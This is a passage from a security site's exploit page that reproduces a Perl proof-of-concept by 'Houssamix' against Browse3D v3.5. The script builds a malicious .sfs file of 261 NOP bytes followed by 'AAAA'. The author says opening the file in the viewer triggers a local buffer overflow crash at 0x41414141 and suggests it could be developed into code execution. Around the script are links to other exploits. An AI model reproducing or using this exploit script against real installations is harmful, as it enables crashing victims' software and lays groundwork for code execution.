首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Browse3D 3.5 (.sfs File) Local Buffer Overflow PoC
来源:www.vfcocus.net 作者:Houssamix 发布时间:2009-01-12  

#!/usr/bin/perl -w

# -- Viva Gazza -- Viva Palestine --

# Browse3D v3.5 (.sfs) File Local Buffer overflow PoC
# http://www.browse3d.com/downloads/Browse3Dsetup.exe

# Author : Houssamix

# create file exploit > open it >
# Error : Access violation at 0x41414141 ( tried to read from 0x41414141 ), program terminated.

# we can't run this program under the debugger !!! any way i think it's can be exploited . good luck !

print "===================================================================== \n";
print "Author : Houssamix           \n";
print "===================================================================== \n";
print "Browse3D v3.5 Local Buffer overflow PoC      \n";
print "===================================================================== \n";

my $adresse = "AAAA" ;
my $nop = "\x90" x 261;

my $file = "Houssamix.sfs";
$exploit = $nop.$adresse;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created open it  with Browse3D v 3.5\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Windows (.CHM File) Denial
·phpMDJ <= 1.0.3 (id_animateur)
·Joomla com_jashowcase (catid)
·Microsoft HTML Workshop <= 4.7
·Joomla com_xevidmegahd (catid)
·Microsoft HTML Workshop <= 4.7
·Microsoft HTML Workshop <= 4.7
·Silentum Uploader 1.4.0 Remote
·VUPlayer 2.49 .ASX File (HREF)
·Simple Machines Forum - Destro
·World Association of Newspaper
·Comersus Shopping Cart <= v6 R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved